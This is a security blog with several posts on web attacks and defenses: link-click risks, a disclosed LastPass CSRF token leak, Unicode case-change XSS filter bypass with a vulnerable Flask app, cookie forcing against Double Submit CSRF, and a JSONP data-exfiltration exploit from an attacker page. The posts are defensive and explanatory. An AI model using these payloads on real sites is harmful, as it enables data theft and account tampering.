ahmsec

Remarks on cyber security & other topics

Risks of Clicking Links

We’re often advised not to click untrusted links, but less often told why. This post will outline a few things that can go wrong when you simply click a link.

In brief, clicking a link can lead to exploitation of vulnerabilities in your environment. These vulnerabilities can be in your apps, computer, local network, web browser, or even in your psyche.

Web app vulnerabilities

A link click can exploit vulnerabilities in web applications you use. The click can send a malicious payload directly to the target web app, or it can load a malicious website, which then sends the payload. A successful attack can result in theft or modification of data from the target web app.

Examples:

Local service vulnerabilities

Your computer may be running local services like web servers or custom protocol handlers. These could be installed by users or by apps. A malicious website can send requests to these services and exploit vulnerabilities in them.

Examples:

Local network access

Your home or office network is typically walled off from the outside world. However, when you click a link and load a malicious website, your browser executes the website’s JavaScript code. This code runs inside your network (since that’s where the browser is). While the code is sandboxed by your browser, it can still do things like:

  • Scan the internal network for devices and ports.
  • Exploit internal devices that have web interfaces, like IoT gadgets, printers, and routers.
  • Exploit internal web apps, which often have weaker security than internet-facing apps.

Examples:

Browser vulnerabilities

Your web browser may have vulnerabilities, even if it’s a modern and commonly-used browser. When you click a link and load a malicious website, the website can break out of the browser’s security controls. This can allow the website to execute code on your device, install malware, or access your accounts on other websites. Browser plugins may also introduce vulnerabilities.

This is perhaps the most fearsome risk on this list. Someone can gain control over your device simply by having you visit a website. Everyone uses web browsers, so anyone can be targeted. Fortunately, however, browser vulnerabilities are not easy to come by, and they are quickly patched after discovery.

Examples:

Privacy

Clicking a link and visiting a website may expose your personal information. This can include your IP address, geolocation, operating system, language, browser information, and more. This information can be unique to you, and may be correlated with activity on other websites.

Example:

Phishing

Clicking a link can take you to a webpage that tricks you (or “phishes” you) into entering your credentials, downloading & running malware, or compromising you in some other way. Good attacks can appear convincing and legitimate.

While phishing could require more than just clicking a link, it is perhaps the most common risk of clicking links, and is frequently the first step in a broader attack.

Examples:

Mitigations

Given all that can go wrong, what can you do about it?

It comes down to basic security hygiene. Use U2F/2FA, use a password manager, keep all software up-to-date, avoid installing unnecessary software, limit app permissions to what is necessary, log out of accounts you’re not using, and put untrusted “smart” devices on separate network segments.

To the extent practical, exercise caution with links, especially if unsolicited. Check if the domain is one you trust or expect. Ensure you’re on HTTPS. Be careful of what you enter, approve, download, or run.

Finally, security practitioners need to ensure that their systems and environments are resilient to users clicking on malicious links. It is unreasonable to expect users never to click on malicious links. Typical internet usage involves clicking many links, and good phishing scenarios are difficult to distinguish from legitimate scenarios.

CSRF Token Leak in LastPass Website Client

Here is a bug I reported to LastPass, copied below with some edits. They shipped a fix within 4 business days and paid out a $1k bounty.

One takeaway is the need for defense-in-depth. While our development standards may prohibit sensitive tokens in URLs, it can still happen due to human error. We can mitigate this by adding a strict Referrer Policy like <meta name="referrer" content="no-referrer">.

A second takeaway is the importance of secure defaults. In this scenario the top-level frame actually had an origin Referrer Policy. However, it did not prevent the vulnerability because child iframes did not inherit the policy. A more secure default might be for browsers to propagate the Referrer Policy to same-origin child iframes that don’t specify their own policy.

LastPass Bug Report

Summary

The website client (https://lastpass.com) leaks CSRF tokens to saved websites. This happens because the iframe containing “Launch” buttons has the CSRF token embedded in the src attribute.

<iframe id="newvault" style="border: 0px; width: 100%; height: 100%;" src="newvault/vault.php?noscript=1&amp;fromindex=1&amp;ac=1&amp;lpnorefresh=1&amp;fromwebsite=1&amp;newvault=1&amp;nk=1&amp;xmlerr=1&amp;token=[redacted]"></iframe>

This vulnerability affects Firefox and potentially other browsers, but does not appear to affect Chrome (not sure why, could be browser referrer policy inheritance or different app codebases).

Impact

A malicious webpage can make various state-changing requests to LastPass, and LastPass will honor them.

Affected endpoints include changing password hint and changing master password (only resulting in account lockout, not credential leak).

There are likely to be more affected endpoints.

Reproduction steps

  1. Log into the Firefox website client on https://lastpass.com.
  2. Add a new site and set the URL to https://www.example.com.
  3. Click ‘Launch’ on the new site.
  4. On the launched page, open your browser dev console and type document.referrer.
  5. Notice the LastPass CSRF token included in the referrer. This is readable by target sites.

If anything doesn’t work, make sure you set the target to an HTTPS site, used Firefox, and used the website client rather than the extension.

Proof of concept

  1. Use Firefox to log into https://lastpass.com.
  2. Add a new site and set the URL to https://poc.ahmsec.io/3302aa361e2a44ca9bb82d66bfedd243/lastpass-csrf.html.
  3. Click ‘Launch’ on the newly added site.
  4. Click ‘Change my password hint’. A real exploit would do this step silently without prompt.
  5. Check your password hint and notice that it changed to “i-got-hacked”.

Potential attack scenarios

  • Victim generates & saves creds for some shady one-off online store. Online store is either compromised or malicious. When victim launches site from LastPass, the site can carry out CSRF attacks against victim’s LastPass.
  • Malicious user shares site with victim on LastPass. Victim launches site to check it out, and is attacked via CSRF.

Suggested mitigations

  1. Send CSRF tokens in request body or header instead of URL parameter.
    • URL parameters have higher risk of leakage via referrers and logs.
  2. Add a <meta name="referrer" content="no-referrer"> referrer policy to https://lastpass.com/newvault/vault.php.
    • This policy is included on the parent frame, but not in the vault.php nested iframe.
  3. On highly sensitive endpoints, require password hash in addition to CSRF token.
    • E.g. while password changes do require entering old password, the final POST request can be made without it. (See sample request.)
  4. Restrict CSRF tokens to sessions. Do not let them be reused across sessions.
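Mitigation 4 can be implemented by deriving the token from the session itself. A minimal sketch in Python, with hypothetical names; binding the token to the session ID via an HMAC means a token captured from one session is useless in any other:

```python
import hashlib
import hmac

def csrf_token_for(session_id: str, secret_key: bytes) -> str:
    # Derive the token from the session ID, so tokens cannot be
    # replayed across sessions.
    return hmac.new(secret_key, session_id.encode(), hashlib.sha256).hexdigest()

def verify_csrf(session_id: str, secret_key: bytes, submitted: str) -> bool:
    # Constant-time comparison avoids leaking token bytes via timing.
    return hmac.compare_digest(csrf_token_for(session_id, secret_key), submitted)
```

With this scheme the server also stores no per-token state; possession of a valid token for a different session proves nothing.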

XSS Filter Evasion via Case Change

This tweet describes an interesting behavior: certain non-ASCII characters map to ASCII characters when converted to upper- or lower-case. Specifically:

ı (\u0131) to upper-case --> I
ſ (\u017f) to upper-case --> S
İ (\u0130) to lower-case --> i
K (\u212a) to lower-case --> k
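These mappings can be checked directly in Python 3 (note that Python 3 lower-cases İ to an ASCII 'i' plus a combining dot, not a bare 'i'):

```python
# Verify the ASCII-producing case mappings (Python 3).
assert "\u0131".upper() == "I"        # ı
assert "\u017f".upper() == "S"        # ſ
assert "\u212a".lower() == "k"        # K (Kelvin sign)
assert "\u0130".lower() == "i\u0307"  # İ -> 'i' + combining dot above
```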

This can help bypass XSS filters and blacklists. For example, the filter in the app below can be bypassed by ?name=<ſcript src="/alert1.js"></script>.

vulnerable-app.py
from flask import Flask, request
app = Flask(__name__)

@app.route("/")
def main():
    name = request.args.get('name') or 'guest'
    if '<script' in name.lower():
        return 'XSS DENIED!'
    return '<html>Welcome, ' + name.upper() + '!</html>'

@app.route("/ALERT1.JS") #normally hosted on attacker site
def alert1():
    return 'alert(1)'

As usual, the best practice for XSS prevention is output encoding; blacklists are easily bypassed.
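For contrast, a minimal fix for the app above encodes the user input for the HTML context instead of trying to filter it (a sketch using the standard library's html.escape):

```python
import html

def render_welcome(name: str) -> str:
    # Encode for the HTML context rather than blacklisting dangerous
    # substrings; case tricks like 'ſcript' no longer matter.
    return "<html>Welcome, {}!</html>".format(html.escape(name))
```

Here the ſ-based payload renders as inert text instead of a script tag.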

Here is a quick script to enumerate characters affected by this behavior. Interestingly, it appears that Python 2 and 3 treat İ (\u0130) differently.

casing-xss.py
import struct

# The ASCII letters A-Z and a-z.
interestingChars = [chr(i) for i in range(65,91)] + [chr(i) for i in range(97,123)]

for i in range(0x10FFFF+1):
    # Decode the code point from raw UTF-32 bytes; 'surrogatepass' keeps
    # the loop running through the surrogate range.
    char = struct.pack('i', i).decode('utf-32', 'surrogatepass')

    charLower = char.lower()
    if charLower in interestingChars and char not in interestingChars:
        print('{} ({}) to lower-case --> {}'.format(char.encode('utf8'), repr(char), charLower))

    charUpper = char.upper()
    if charUpper in interestingChars and char not in interestingChars:
        print('{} ({}) to upper-case --> {}'.format(char.encode('utf8'), repr(char), charUpper))

CSRF: Double Submit Cookies Insufficient Against MitM

Suppose you’re at the latest hip coffee shop in town, enjoying their comfy chairs and high-speed wifi. You’re doing some confidential work using a relatively secure web application. The application always uses TLS, redirects HTTP requests back to HTTPS, and deploys Double Submit Cookies (with the ‘secure’ cookie flag) to protect from CSRF. Now suppose that the coffee shop staff becomes part of your threat model. Could they still launch CSRF attacks against you? After all, they can’t read TLS-encrypted traffic, so they can’t possibly steal CSRF tokens.

It turns out that actually yes, given the scenario above, a man-in-the-middle (with your pick of malicious staff, rogue access point, or ARP poisoning) can defeat the Double Submit defense. And it’s a simple attack, not one that requires you to break TLS or WPA2. Here’s how it works:

  1. Victim conducts secret business on https://secret.example.com (MitM attacker can’t read this traffic.)
  2. Victim visits a non-SSL website like http://stackoverflow.com or http://www.cnn.com (MitM can read and modify this traffic.)
  3. MitM injects <img src="http://secret.example.com/non-existent.png"/> into the response from (2). Note that the img tag’s protocol is HTTP, not HTTPS.
  4. Victim’s browser receives the image tag, and sends a secondary non-SSL request to http://secret.example.com/non-existent.png. (CSRF cookie not sent because of secure flag.)
  5. MitM intercepts the response from http://secret.example.com, which could be a 301 redirect [1] or a 404 error, and injects a Set-Cookie header that overwrites the victim’s CSRF cookie with a known value. Details on how later.
  6. Since the attacker knows the CSRF cookie value, he or she can now trigger a request that includes the CSRF token in the body.

All of this can be automated for your exploit. A non-intuitive step in this attack scenario is perhaps #5. How could a non-SSL response possibly overwrite cookies that have the ‘secure’ flag and that were set under SSL? That unfortunately is allowed by design and is how the web works today. Here’s an article that describes the issue: http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html .
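The heart of the weakness is that Double Submit validation is nothing more than a comparison of two attacker-influenceable values. A sketch with a hypothetical helper:

```python
def double_submit_ok(cookie_token, body_token):
    # Double Submit check: accept the request when the token in the CSRF
    # cookie matches the token echoed in the request body. The server
    # keeps no per-session record of which tokens it issued.
    return cookie_token is not None and cookie_token == body_token

# Steps 5-6: an attacker who can force the cookie picks a known value
# and submits it in both places, and the check passes.
forged = "attacker-chosen-token"
```

Because nothing ties the token to the victim's session, a cookie overwrite is all it takes.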

One way to protect against this scenario is to use HSTS. However, you have to make sure that every single subdomain has HSTS, because any child subdomain can be used to set cookies for the top-level parent domain, and those cookies will subsequently be sent with requests to every subdomain. You also have to make sure you don’t have users on browsers without HSTS support, such as IE < 11.

A few takeaways:

  1. Double Submit Cookies are a common way to protect against CSRF. They’re recommended by OWASP and used by several websites and frameworks. However, if you need to protect against MitM, you should consider a different defense.
  2. Cookies should be treated as untrusted and attacker-controlled input. Be careful of mistakes like allowing user-generated session cookies and not sanitizing cookie-sourced values for XSS.

For further discussion on these topics, please see the following articles:

  • http://scarybeastsecurity.blogspot.com/2008/11/cookie-forcing.html
  • https://media.blackhat.com/eu-13/briefings/Lundeen/bh-eu-13-deputies-still-confused-lundeen-wp.pdf


[1] For a workaround to browsers’ aggressive caching of 301 redirects, see http://security.stackexchange.com/a/117138.

The Dangers of JSONP

This post is about how I learned of JSONP as an attack vector. It isn’t a new vulnerability, but it was nice to discover it on my own.

A note on Same-Origin Policy

Same-Origin Policy (SOP) prevents a webpage from reading data on a different domain. So if you open a tab with hacker.com, your browser won’t let it read data on bank.com. There are notable exceptions, like <img> and <script> tags. However, browsers strictly limit their scope. For example, a webpage can only execute a cross-domain script, not read its contents.

Some interesting behavior

Playing with traffic in Burp, I observed the following behavior: whatever you pass in the “callback” parameter is reflected in the response.

Request: GET /sensitive_resource?callback=myFunction
Response: myFunction({"key1":"data1", "key2":"data2", ...})

Request: GET /sensitive_resource?callback=AAAAAAAA
Response: AAAAAAAA({"key1":"data1", "key2":"data2", ...})

My first instinct was to test for XSS, but all output was correctly encoded. The response contained private data, but it required an authenticated session to access.

(Later on I learned that this request/response behavior is an old technique called JSONP. It was used to get around Same-Origin Policy restrictions before CORS came about.)
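Server-side, a JSONP endpoint amounts to little more than string concatenation. A hypothetical sketch (the real endpoint additionally required an authenticated session):

```python
def jsonp_response(callback: str, private_json: str) -> str:
    # Wrap private JSON in whatever function name the caller supplies,
    # turning inert data into executable JavaScript.
    return "{}({})".format(callback, private_json)
```

That executable wrapper is exactly what makes the cross-domain read below possible.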

The exploit

What if we request that resource from a <script> tag on the attacker’s webpage? Notice that the response data is wrapped with a JavaScript function call that we control. Can we pre-define that function on the attacker’s webpage?

www.attacker.com:

<script>
var exfil_function = function(data) {
  parsed_data = response_specific_parsing(data);
  alert(parsed_data);
  exfil(parsed_data);
};
</script>

<script src="https://www.victim.com/sensitive_resource?callback=exfil_function"> </script>

And it works! The cross-domain script executes exfil_function({"key1":"data1", "key2":"data2", ...}), and since we control the definition of exfil_function, we can have it read the data!

Now when an authenticated victim views this malicious webpage, it does a cross-domain read of the sensitive resource and exfiltrates the private data.

Lesson: don’t use JSONP with private data

JSONP effectively disables Same-Origin Policy for a resource. So be cautious of using it with private data. Instead, use CORS, which gives you fine-grained and securely designed control over cross-origin sharing.
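The difference can be sketched in a few lines of Python (the whitelist and helper are hypothetical): with CORS the server names exactly which origins may read the response, and everyone else stays blocked by Same-Origin Policy.

```python
ALLOWED_ORIGINS = {"https://partner.example.com"}  # hypothetical whitelist

def cors_headers(origin: str) -> dict:
    # Grant read access only to explicitly whitelisted origins.
    if origin in ALLOWED_ORIGINS:
        return {"Access-Control-Allow-Origin": origin, "Vary": "Origin"}
    return {}
```

An attacker's origin gets no Access-Control-Allow-Origin header, so the browser withholds the response body, unlike JSONP, which hands it to anyone.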

A slightly related vulnerability is JSON Hijacking. In either case, the lesson is the same: do not return sensitive data wrapped in JavaScript functions or arrays.

Custom Headers as CSRF Defense

CSRF is a prevalent and well-known vulnerability that affects web applications. The common way to protect against CSRF is to require anti-CSRF tokens on state-modifying requests. For defense in depth, you can add an extra layer of security by additionally requiring custom headers. This can mitigate scenarios where anti-CSRF tokens are somehow leaked (something I have seen happen).

Simple vs Preflighted Requests

The Mozilla article on CORS does a nice job of explaining the difference between “simple” and “preflighted” requests.

  • Simple requests are sent by traditional mechanisms on the web, such as GETs made by <img> tags or POSTs made by HTML forms. The browser will always send them cross-origin, and will always pass along session cookies. This behavior is what makes CSRF possible.

  • Preflighted requests are requests that either contain custom headers or use methods other than GET, POST, or HEAD. Browsers will refuse to send these requests cross-origin unless the server explicitly allows it. To check this permission, browsers will send a “pre-flight” OPTIONS request before sending the actual request, and the server has to reply with the appropriate CORS headers. If the server doesn’t, the actual request is never sent.

Note the difference: simple requests are always sent cross-origin, even though Same-Origin Policy blocks the responses. When preflighted, the request isn’t even sent in the first place.
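The browser's decision can be approximated in a few lines of Python. This is a simplified sketch (the full CORS rules also constrain which Content-Type values count as simple):

```python
SIMPLE_METHODS = {"GET", "POST", "HEAD"}
# Request headers a browser permits on "simple" requests (abridged).
SAFELISTED_HEADERS = {"accept", "accept-language", "content-language", "content-type"}

def needs_preflight(method: str, header_names) -> bool:
    # A non-simple method or any custom header forces a preflight
    # OPTIONS request before the real request is sent.
    if method.upper() not in SIMPLE_METHODS:
        return True
    return any(h.lower() not in SAFELISTED_HEADERS for h in header_names)
```

A plain form POST sails through, while adding something like X-Requested-With trips the preflight requirement.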

Preflighted Requests and CSRF

If a resource requires a non-standard header or method, it won’t be sent cross-origin (unless the victim domain for some reason whitelists the attacker domain). Since the request is never sent, CSRF attacks are blocked.

Bypassing Custom Header Restrictions

While requiring custom headers is a useful layer of CSRF defense, it shouldn’t be the only one. Up until March 2015, Adobe Flash had a vulnerability that allowed you to send custom headers cross-origin. Here are two well-written posts describing the technique:

Conclusion

Consider requiring custom headers on your sensitive state-modifying requests. For example, you can require an X-Requested-With header on AJAX calls and refuse to honor those that don’t include it.
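The server-side check is a one-liner. A hypothetical sketch; a cross-origin "simple" request cannot carry this header without triggering a preflight, which the server simply never approves:

```python
def honor_state_change(headers: dict) -> bool:
    # Defense in depth: refuse state-changing requests that lack the
    # custom header only same-origin AJAX code will have added.
    return headers.get("X-Requested-With") == "XMLHttpRequest"
```

Your own JavaScript sets the header on every AJAX call; forged cross-origin form posts and img-tag GETs cannot.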

First Post!

I know you’ve been waiting eagerly, but it’s finally here: my own personal blog! … Just kidding, I can hear the crickets chirping. This is intended to be an informal space for me to write about topics of interest. Mostly technical posts about what I’m learning in “cyber” security (to use the current vernacular). Perhaps other topics as well. If future generations come across these posts and benefit, that will be great!